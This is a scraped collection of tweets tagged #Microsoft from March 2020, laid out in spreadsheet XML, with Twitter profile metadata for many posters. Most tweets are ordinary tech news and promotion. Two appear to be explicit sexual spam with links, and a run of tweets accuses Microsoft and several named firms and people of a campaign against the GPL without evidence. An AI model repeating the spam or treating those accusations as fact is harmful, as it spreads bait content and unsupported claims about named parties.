    <t>{'id': 256412004, 'id_str': '256412004', 'name': 'akhildynamics (MCT)', 'screen_name': 'akhildynamics', 'location': 'Singapore', 'description': 'Microsoft Certified Trainer (MCT), Dynamics 365 &amp; Power Platform Enthusiast, Supporter, Endorser.', 'url': 'https://t.co/wvX02wwwyO', 'entities': {'url': {'urls': [{'url': 'https://t.co/wvX02wwwyO', 'expanded_url': 'https://akhildynamics.com', 'display_url': 'akhildynamics.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 107, 'friends_count': 226, 'listed_count': 1, 'created_at': 'Wed Feb 23 08:11:45 +0000 2011', 'favourites_count': 494, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 483,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'http://pbs.twimg.com/profile_images/1160148303658401792/SPvfW8Cg_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1160148303658401792/SPvfW8Cg_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/256412004/1565453041',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</si>
  <si>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14:28:01 +0000 2020</t>
  </si>
  <si>
    <t>Join our @NICECompliance and @Microsoft compliance 'rock stars' for a forum dedicated to #Cloud and #Teams. Its your last chance to register  click here to learn more &amp;gt;&amp;gt;  https://t.co/Jt9BGWvVUU
#NICECompliance #NetworkwithNICE #Microsoft #Compliance
https://t.co/lnoUmpgkWq</t>
  </si>
  <si>
    <t>{'id': 57308523, 'id_str': '57308523', 'name': 'Sanjeev Koul', 'screen_name': 'Sanjeev_koul', 'location': 'India', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 142, 'friends_count': 257, 'listed_count': 3, 'created_at': 'Thu Jul 16 11:25:12 +0000 2009', 'favourites_count': 572, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 851,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'http://pbs.twimg.com/profile_images/997818387282743298/mZw8nupD_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/997818387282743298/mZw8nupD_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/57308523/1513396120',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</si>
  <si>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14:27:36 +0000 2020</t>
  </si>
  <si>
    <t>#microsoft created an extensive framework and network of proxies to smear and mislead about the #gpl for well over a decade. Recent joiners are #WhiteSource and #Snyk</t>
  </si>
  <si>
    <t>Tue Mar 03 14:27:14 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Xbox One X 1TB Console - Bundle with Games   Accessories  ( 58 Bids )   #Microsoft  #Xbox  https://t.co/LFjMROTzAA</t>
  </si>
  <si>
    <t>{'id': 1020736946509926401, 'id_str': '1020736946509926401', 'name': 'Deayla Puilte', 'screen_name': 'puilte', 'location': 'New York, USA', 'description': 'music sports news travel', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 749, 'friends_count': 55, 'listed_count': 14, 'created_at': 'Sat Jul 21 18:27:07 +0000 2018', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 11825, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1020738212703145984/9IIdDJa-_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1020738212703145984/9IIdDJa-_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1020736946509926401/1532198086',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</si>
  <si>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14:25:29 +0000 2020</t>
  </si>
  <si>
    <t>#blackduck was created by a #microsoft #marketing person to attack the #gpl but don't forget #openlogic (same). Stormy Peters worked there before working directly for Microsoft https://t.co/0vbOwDK720</t>
  </si>
  <si>
    <t>Tue Mar 03 14:24:41 +0000 2020</t>
  </si>
  <si>
    <t>#AI #chipmaker, #Graphcore secured $150M at around $1.95 bn valuation
https://t.co/CXoIglql7U
#TechCrunch #Investments #MayfairEquity #BaillieGifford #ai #artificialintelligence #machinelearning #azure #ml #business #microsoft #DellTechnologies #cloud #cloudcomputing
PC: Pixabay https://t.co/djiu8QuZTn</t>
  </si>
  <si>
    <t>{'id': 40489005, 'id_str': '40489005', 'name': 'TechSutram', 'screen_name': 'techsutram', 'location': 'Pune, India', 'description': 'We bring the latest on the convergence of #Blockchain, #Cloud computing, #IoT, #AI, #Startups. Links are not endorsements. Detail Disclaimer: https://t.co/pftQYw9GQ4', 'url': 'https://t.co/S0CYS4zE3d', 'entities': {'url': {'urls': [{'url': 'https://t.co/S0CYS4zE3d', 'expanded_url': 'http://www.techsutram.com', 'display_url': 'techsutram.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/pftQYw9GQ4', 'expanded_url': 'http://bit.ly/2S9bv9q', 'display_url': 'bit.ly/2S9bv9q', 'indices': [142, 165]}]}}, 'protected': False, 'followers_count': 1084, 'friends_count': 663, 'listed_count': 99, 'created_at': 'Sat May 16 16:08:08 +0000 2009', 'favourites_count': 2004, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 6940,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'http://pbs.twimg.com/profile_images/916199810058686464/sL0iX59y_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/916199810058686464/sL0iX59y_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/40489005/1545997493',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</si>
  <si>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14:23:18 +0000 2020</t>
  </si>
  <si>
    <t>Asking #microsoft and companies connected to it, such as #OpenLogic , about #freesw licences in order to promote the anti- #copyleft agenda https://t.co/LhUvA5N033</t>
  </si>
  <si>
    <t>Tue Mar 03 14:23:11 +0000 2020</t>
  </si>
  <si>
    <t>4 great tips for working from home, something I do most days :-) , from Microsoft's @Karuana #Microsoft #technology https://t.co/AFGLNUR5fH #MSFTAdvocate</t>
  </si>
  <si>
    <t>Tue Mar 03 14:21:09 +0000 2020</t>
  </si>
  <si>
    <t>February in HLS - Teams, Live Events, AI, Power BI, Data Protection and Clinical Industry Experts! https://t.co/zqrjUPVGq2 #microsoft #microsoftteams #office365 #microsoft365 #healthcare</t>
  </si>
  <si>
    <t>Tue Mar 03 14:20:39 +0000 2020</t>
  </si>
  <si>
    <t>Haha halo is the best
#xbox #xboxone #masterchief #halo5 #microsoft #guns #2ndamendment #america #pyrography #woodburning #pyrographyart #games #gamerguy #gamer #gamer4life #destinythegame #samsung... https://t.co/qkWpKWvKWr</t>
  </si>
  <si>
    <t>Tue Mar 03 14:19:56 +0000 2020</t>
  </si>
  <si>
    <t>Learn to Code: Minecraft https://t.co/g5D7s3x4Ao #Mod #Microsoft #Minecraft https://t.co/CeUDBcXpXV</t>
  </si>
  <si>
    <t>Tue Mar 03 14:19:41 +0000 2020</t>
  </si>
  <si>
    <t>I wrote this earlier this year and I can tell you that based on what I am seeing, #Microsoft is masterfully executing to their plan.  Enterprises need to prepare for their renewals in new ways and much earlier.  #ensw 
https://t.co/AQ0moBpAfx</t>
  </si>
  <si>
    <t>Tue Mar 03 14:19:04 +0000 2020</t>
  </si>
  <si>
    <t>Today, we hosted our fully booked #SharePoint Bootcamp  in our offices! We hope everyone found the day insightful!
Also great to see so many #WomenInTech in the room 
If you would like to advance your #Microsoft skills, sign up for our bootcamps here: https://t.co/s1yKiUrMub https://t.co/bQyfo2BYom</t>
  </si>
  <si>
    <t>{'id': 462748162, 'id_str': '462748162', 'name': 'Spanish Point Tech', 'screen_name': 'Spanish_Point', 'location': 'Dublin, Ireland', 'description': 'Spanish Point is a Certified Gold Microsoft Partner which provides innovative business solutions &amp;  is Microsoft Country Partner of the Year 2019 for Ireland', 'url': 'http://t.co/LMm8BERhHl', 'entities': {'url': {'urls': [{'url': 'http://t.co/LMm8BERhHl', 'expanded_url': 'http://www.spanishpoint.ie', 'display_url': 'spanishpoint.ie', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 660, 'friends_count': 1881, 'listed_count': 35, 'created_at': 'Fri Jan 13 09:23:58 +0000 2012', 'favourites_count': 422, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1336,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'http://pbs.twimg.com/profile_images/1149348298358231043/i4PfHAJ4_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1149348298358231043/i4PfHAJ4_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/462748162/1562861318',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</si>
  <si>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14:18:56 +0000 2020</t>
  </si>
  <si>
    <t>More than 30% of businesses use advanced communication tools in conference rooms. Want to find the #teamworksolution that's right for your business? Check out this infographic to see the latest #Microsoft solutions available to your team. https://t.co/R6rxz6VmD9</t>
  </si>
  <si>
    <t>{'id': 16953599, 'id_str': '16953599', 'name': 'qrsystems', 'screen_name': 'qrsystems', 'location': 'USA', 'description': 'Q.R. Systems is a consulting firm specializing in providing IT for solutions including network security to businesses. Helping buzs max IT to save cost', 'url': 'http://t.co/iDlVJUJJ0r', 'entities': {'url': {'urls': [{'url': 'http://t.co/iDlVJUJJ0r', 'expanded_url': 'http://www.qrsystem.com', 'display_url': 'qrsystem.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 90, 'friends_count': 168, 'listed_count': 7, 'created_at': 'Fri Oct 24 18:05:08 +0000 2008', 'favourites_count': 144, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3375, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'C6E2EE', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme8/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme8/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1437421410/Q-logo_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1437421410/Q-logo_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/16953599/1490730976',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</si>
  <si>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Tue Mar 03 14:18:32 +0000 2020</t>
  </si>
  <si>
    <t>I love to caress my pussy in the morning
https://t.co/0fDZGUbm8y
#Ohio
 #thread #microsoft https://t.co/FhZNBi1XzH</t>
  </si>
  <si>
    <t>{'id': 1233823581546610688, 'id_str': '1233823581546610688', 'name': 'Julissa Jimenez', 'screen_name': 'Julissa60937755', 'location': 'Sioux Falls, USA', 'description': 'No matter how dark the moment, love and hope are always possible', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 8, 'friends_count': 46, 'listed_count': 0, 'created_at': 'Sat Feb 29 18:37:25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'http://pbs.twimg.com/profile_images/1234097043485970432/5ldquJ1J_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234097043485970432/5ldquJ1J_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1233823581546610688/1583007526',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</si>
  <si>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14:13:56 +0000 2020</t>
  </si>
  <si>
    <t>Today #Avera360IT starts the day with an office setup and #IT migration. Later on we will be building a #NAS #server for testing against a clients #windows server.  #pearland #houstontx #houston #VPN #microsoft #seabrook #galveston #sugarland #smallbiz #pc #tech #technews https://t.co/7hnOnEcYuj</t>
  </si>
  <si>
    <t>{'id': 1201909391131316225, 'id_str': '1201909391131316225', 'name': 'Avera360IT', 'screen_name': 'Avera360IT', 'location': 'Pearland, TX', 'description': 'Avera360IT Provides IT Support and Technology Services, Solutions, and Repairs for Residential and Commercial Customers in the Houston Area.', 'url': 'https://t.co/4JHK44x4mN', 'entities': {'url': {'urls': [{'url': 'https://t.co/4JHK44x4mN', 'expanded_url': 'https://www.avera360it.com/', 'display_url': 'avera360it.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 30, 'friends_count': 87, 'listed_count': 0, 'created_at': 'Tue Dec 03 17:01:59 +0000 2019', 'favourites_count': 72, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 91, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1201909646505730049/isiDgzfM_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1201909646505730049/isiDgzfM_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1201909391131316225/1575393004',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</si>
  <si>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14:13:41 +0000 2020</t>
  </si>
  <si>
    <t>New release: SharePointDsc v3.8 released by new CD/CI pipeline #Microsoft  https://t.co/4BXvbNSLpS</t>
  </si>
  <si>
    <t>Tue Mar 03 14:13:27 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve"> Microsoft CEO Satya Nadella interview on how the tech industry can win back public trust | Fortune #vocativeconsulting #Microsoft #CEO #ChiefExecutiveOfficer https://t.co/15qrlWh4QU https://t.co/i3xTH5oiTX</t>
  </si>
  <si>
    <t>{'id': 444506496, 'id_str': '444506496', 'name': 'Justin Sleep', 'screen_name': 'VocativeJustin', 'location': 'St Albans, UK', 'description': "We match great IT people with growing companies. It's an art, not a science. https://t.co/ApodtDvAbZ", 'url': 'https://t.co/ApodtDvAbZ', 'entities': {'url': {'urls': [{'url': 'https://t.co/ApodtDvAbZ', 'expanded_url': 'http://Vocative.co', 'display_url': 'Vocative.co', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/ApodtDvAbZ', 'expanded_url': 'http://Vocative.co', 'display_url': 'Vocative.co', 'indices': [77, 100]}]}}, 'protected': False, 'followers_count': 242, 'friends_count': 182, 'listed_count': 17, 'created_at': 'Fri Dec 23 10:00:54 +0000 2011', 'favourites_count': 7, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2043,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'http://pbs.twimg.com/profile_images/1172497378340945921/zQjErhF-_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1172497378340945921/zQjErhF-_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/444506496/1415877208',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</si>
  <si>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14:12:36 +0000 2020</t>
  </si>
  <si>
    <t>Today's #TroubleshootingTuesday features Brien Posey, #Microsoft MVP, explaining how you can make #troubleshooting #citrix is slow" complaints easy! #visibility #automation #howto #proactive https://t.co/d9EaxFQ66n https://t.co/wr7v4fgTOd</t>
  </si>
  <si>
    <t>{'id': 225951051, 'id_str': '225951051', 'name': 'Goliath Technologies', 'screen_name': 'GoliathSolution', 'location': 'Philadelphia, PA', 'description': 'Goliath provides monitoring and troubleshooting software for hybrid IT environments. Anticipate, troubleshoot, &amp; prevent end-user experience issues.', 'url': 'https://t.co/amVSe7xVJl', 'entities': {'url': {'urls': [{'url': 'https://t.co/amVSe7xVJl', 'expanded_url': 'http://goliathtechnologies.com', 'display_url': 'goliathtechnologies.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1553, 'friends_count': 1203, 'listed_count': 53, 'created_at': 'Sun Dec 12 22:25:01 +0000 2010', 'favourites_count': 1804, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2846,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'http://pbs.twimg.com/profile_images/915293272465186817/qvXdxG1s_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/915293272465186817/qvXdxG1s_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/225951051/1559842914', 'profile_link_color': '3B94D9',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</si>
  <si>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14:12:15 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #schrapt #Ignite The Tour-evenement in #Amsterdam wegens #coronavirus -  https://t.co/UfmPPFZAb9</t>
  </si>
  <si>
    <t>{'id': 246220953, 'id_str': '246220953', 'name': 'Hans Spek', 'screen_name': 'HansSpek', 'location': '', 'description': 'Husband | Father | Microsoft | SCCM | Virtualization | Deployment | Windows 10 | MCSE | MCITP | Cloud | Running | Formula 1', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 200, 'friends_count': 270, 'listed_count': 55, 'created_at': 'Wed Feb 02 11:32:18 +0000 2011', 'favourites_count': 76, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 5884,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'http://pbs.twimg.com/profile_images/815869089310789633/YG2ie3xS_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/815869089310789633/YG2ie3xS_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/246220953/1550571142',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</si>
  <si>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14:12:03 +0000 2020</t>
  </si>
  <si>
    <t>Inclusive coding idea! 
#ImmersiveReader "is now an Azure Cognitive Service, an API can be embedded into your own code to improve readability in text-heavy applications." https://t.co/CVs3CyMvFZ #a11y #Microsoft @MSFTEnable #COGA #WebApp #Developer</t>
  </si>
  <si>
    <t>{'id': 620391147, 'id_str': '620391147', 'name': 'Jennie Delisi', 'screen_name': 'AT_NMT', 'location': '', 'description': 'I am an Accessibility Analyst (ed. as a Neurologic Music Therapist). \nOpinions expressed are mine &amp; may not be those of my employer. \n#Accessibility #a11y', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1621, 'friends_count': 3571, 'listed_count': 195, 'created_at': 'Wed Jun 27 20:18:18 +0000 2012', 'favourites_count': 2369, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 4305,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'http://pbs.twimg.com/profile_images/895473363098902528/DZQeGlcs_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/895473363098902528/DZQeGlcs_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/620391147/1491015018', 'profile_link_color': '000080',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</si>
  <si>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14:12:01 +0000 2020</t>
  </si>
  <si>
    <t>Does teams meeting add in outlook for mac only work in exchange online ? #sphelp #sharepoint #office365dev #office365 #microsoft #msteams #microsoftteams @vesajuvonen @waldekm can anyone comment ? https://t.co/Ykxcd1Fe4w</t>
  </si>
  <si>
    <t>{'id': 113862110, 'id_str': '113862110', 'name': 'Harsh Damania', 'screen_name': 'dmysteryunfolds', 'location': 'Oslo, Norway', 'description': 'SharePointing since the beginning of my journey in industry ðŸ˜\n#Spfx #microsoftflow #powerapps #powershell #pnp #office365cli #sharepoint', 'url': 'https://t.co/nrOUbFStOs', 'entities': {'url': {'urls': [{'url': 'https://t.co/nrOUbFStOs', 'expanded_url': 'http://sharepointhd.wordpress.com', 'display_url': 'sharepointhd.wordpress.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 212, 'friends_count': 831, 'listed_count': 13, 'created_at': 'Sat Feb 13 08:25:25 +0000 2010', 'favourites_count': 1565, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 6058,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'http://pbs.twimg.com/profile_images/1105600905439784965/tZTebPvv_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1105600905439784965/tZTebPvv_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/113862110/1552430771', 'profile_link_color': 'FF691F', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'E3E2DE', 'profile_text_color': '634047', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Tue Mar 03 14:11:34 +0000 2020</t>
  </si>
  <si>
    <t>#StarWind_how_to
Eliminate exposure to the public internet by creating private endpoints in your virtual network by routing the traffic over the #Microsoft backbone network. Read more about #AzurePrivateLink in the article by @PrigentNico for #StarWind
https://t.co/toI0QA7xV4</t>
  </si>
  <si>
    <t>{'id': 20241910, 'id_str': '20241910', 'name': 'StarWind', 'screen_name': 'starwindsan', 'location': 'USA', 'description': 'All about StarWind and #virtualization  #VSAN #HyperConverged #HCI #SDS', 'url': 'https://t.co/igEneM4ye6', 'entities': {'url': {'urls': [{'url': 'https://t.co/igEneM4ye6', 'expanded_url': 'https://www.starwindsoftware.com/', 'display_url': 'starwindsoftware.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 8021, 'friends_count': 6378, 'listed_count': 226, 'created_at': 'Fri Feb 06 14:56:52 +0000 2009', 'favourites_count': 919, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 5073,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'http://pbs.twimg.com/profile_images/1047488025201135616/kup7GncI_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1047488025201135616/kup7GncI_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/20241910/1538575556', 'profile_link_color': '143C89',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</si>
  <si>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14:07:08 +0000 2020</t>
  </si>
  <si>
    <t>#RELIANCE &amp;amp; #Microsoft will come together for  providing #easeofliving. #Digital #MukeshAmbani #futuredecoded</t>
  </si>
  <si>
    <t>{'id': 203480003, 'id_str': '203480003', 'name': 'NIKHIL SHARMA', 'screen_name': 'nikhilpec', 'location': 'Jaipur,Rajasthan,India', 'description': 'Work as recruiter in private organisation.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 108, 'friends_count': 49, 'listed_count': 200, 'created_at': 'Sat Oct 16 11:05:10 +0000 2010', 'favourites_count': 474, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 9022, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '0099B9', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme10/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme10/bg.gif', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/438607241839534080/np2M6IX5_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/438607241839534080/np2M6IX5_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/203480003/1556181314', 'profile_link_color': '981CEB',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</si>
  <si>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Tue Mar 03 14:05:18 +0000 2020</t>
  </si>
  <si>
    <t>VIDEO: Deploying #Windows 10 Always On #VPN user tunnel using #Microsoft #Intune. #Windows10 #Win10 #mobility #msintune #aovpn https://t.co/d28ux1Gmfk</t>
  </si>
  <si>
    <t>Tue Mar 03 14:05:15 +0000 2020</t>
  </si>
  <si>
    <t>via #Citrix Blogs: "Manage, monitor your Citrix environment with ControlUp: " https://t.co/ydLf0dZRWf
.
.
.
#blog #virtualization #cloudcomputing #cloud #security #microsoft #azure #citrix #citrixishow</t>
  </si>
  <si>
    <t>Tue Mar 03 14:04:35 +0000 2020</t>
  </si>
  <si>
    <t>suck guy in the morning it's cool #Berkeley  #microsoft #sun https://t.co/Ni26YZPIRU</t>
  </si>
  <si>
    <t>{'id': 1234542163205246976, 'id_str': '1234542163205246976', 'name': 'Stacy Thompson', 'screen_name': 'idisunri', 'location': 'Buffalo, USA', 'description': 'The heart wants what it wants. Thereâ€™s no logic to these things. You meet someone and you fall in love and thatâ€™s that', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 5, 'friends_count': 24, 'listed_count': 0, 'created_at': 'Mon Mar 02 18:12:49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'http://pbs.twimg.com/profile_images/1234580530575945730/TwSsvTZw_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234580530575945730/TwSsvTZw_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1234542163205246976/1583181937',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</si>
  <si>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14:04:08 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft exploring possible summer launch for #Surface Duo https://t.co/CMspuN18QV</t>
  </si>
  <si>
    <t>Tue Mar 03 14:03:56 +0000 2020</t>
  </si>
  <si>
    <t>With just over a week to go until the @DigitalCityFest returns better than ever before.
We're proud to announce that not only are we sponsoring a keynote session but Ben Irons from @MSFTAdvertising will be speaking on behalf of Adzooma. 
#DigitalCityFest #Adzooma #Microsoft https://t.co/LChTddu9ZB</t>
  </si>
  <si>
    <t>{'id': 773180865820102657, 'id_str': '773180865820102657', 'name': 'Adzooma ðŸš€', 'screen_name': 'adzooma', 'location': 'Nottingham, UK ', 'description': 'The smart, powerful and easy-to-use advertising platform that helps businesses large, medium and small grow. Optimise. Automate. Win.', 'url': 'https://t.co/nXnCUL9Mmy', 'entities': {'url': {'urls': [{'url': 'https://t.co/nXnCUL9Mmy', 'expanded_url': 'https://www.adzooma.com/', 'display_url': 'adzooma.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 792, 'friends_count': 644, 'listed_count': 20, 'created_at': 'Tue Sep 06 15:27:38 +0000 2016', 'favourites_count': 685, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1406,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'http://pbs.twimg.com/profile_images/1212674646593744896/8AfNFnwA_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1212674646593744896/8AfNFnwA_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/773180865820102657/1572880433', 'profile_link_color': '407BB9',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</si>
  <si>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14:02:24 +0000 2020</t>
  </si>
  <si>
    <t>Sign up for tomorrows FREE webinar and learn why you cant ignore O365 data backup if you want to protect your systems! #Webinar #Data #Office365 #Microsoft #Productivity #Datarecovery
Sign up here  https://t.co/H8k5T6SOqF https://t.co/d3PqklELyL</t>
  </si>
  <si>
    <t>Tue Mar 03 14:01:31 +0000 2020</t>
  </si>
  <si>
    <t>Mini Toolbar: Don't use the ribbon at the top for formatting. Right-click and use the mini-toolbar instead. #Microsoft #Office365 https://t.co/s2ovdbRcSx</t>
  </si>
  <si>
    <t>Tue Mar 03 14:01:14 +0000 2020</t>
  </si>
  <si>
    <t>Congratulations on yet another achievement as a 
@Certiport  authorized testing and the participants who got #MOSCertified .
 #MOS #Microsoft #YALITransformation https://t.co/t6eTSsIqWw</t>
  </si>
  <si>
    <t>{'id': 2873968726, 'id_str': '2873968726', 'name': 'MOSWC Kenya', 'screen_name': 'MOSWCKenya', 'location': 'Nairobi, Kenya', 'description': "Announcing Certiport's 2019 Microsoft Office Specialist World Championship Kenya national qualifying round from Sep 1 2018 to Apr 30 2019.", 'url': 'https://t.co/jTbdAbsaJY', 'entities': {'url': {'urls': [{'url': 'https://t.co/jTbdAbsaJY', 'expanded_url': 'http://bit.ly/2NIoETl', 'display_url': 'bit.ly/2NIoETl', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3023, 'friends_count': 2384, 'listed_count': 10, 'created_at': 'Wed Nov 12 16:43:14 +0000 2014', 'favourites_count': 361, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1528,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'http://pbs.twimg.com/profile_images/768863233931407361/IvbE8m4-_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/768863233931407361/IvbE8m4-_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2873968726/1535878877',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</si>
  <si>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14:00:50 +0000 2020</t>
  </si>
  <si>
    <t>#PreMarket &amp;gt; #MAGA flat...
#Microsoft $MSFT ( #MarketCap number one )
#Apple $AAPL
#Google $GOOGL
#Amazon $AMZN
PS: #Tesla $TSLA : 800$ / +7.65% / https://t.co/UYnS82mOvg</t>
  </si>
  <si>
    <t>Tue Mar 03 14:00:35 +0000 2020</t>
  </si>
  <si>
    <t>#Vatican joins #IBM and #Microsoft to call for facial recognition regulation
Find more about "algor-ethics" here: https://t.co/TRPAhqcDoI 
#facialrecognition #ArtificialInteligence #CyberSec https://t.co/j417ADfnPZ</t>
  </si>
  <si>
    <t>{'id': 1433306666, 'id_str': '1433306666', 'name': 'teiss', 'screen_name': 'TEISS', 'location': 'London, UK', 'description': 'News, articles, video interviews and podcasts focused on sharing best practice for Information Security leaders.', 'url': 'https://t.co/SlPvGRh6hL', 'entities': {'url': {'urls': [{'url': 'https://t.co/SlPvGRh6hL', 'expanded_url': 'http://goo.gl/qffU93', 'display_url': 'goo.gl/qffU93', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 8099, 'friends_count': 3063, 'listed_count': 250, 'created_at': 'Thu May 16 15:02:31 +0000 2013', 'favourites_count': 603, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 8450,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'http://pbs.twimg.com/profile_images/1168835922646970368/9Nqh3ciA_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1168835922646970368/9Nqh3ciA_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1433306666/1567507175', 'profile_link_color': '38ACDA',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</si>
  <si>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14:00:25 +0000 2020</t>
  </si>
  <si>
    <t>#Apple Mac vs #Microsoft Windows for Software Engineers (best laptop for programming) https://t.co/HXE900odtW via @YouTube</t>
  </si>
  <si>
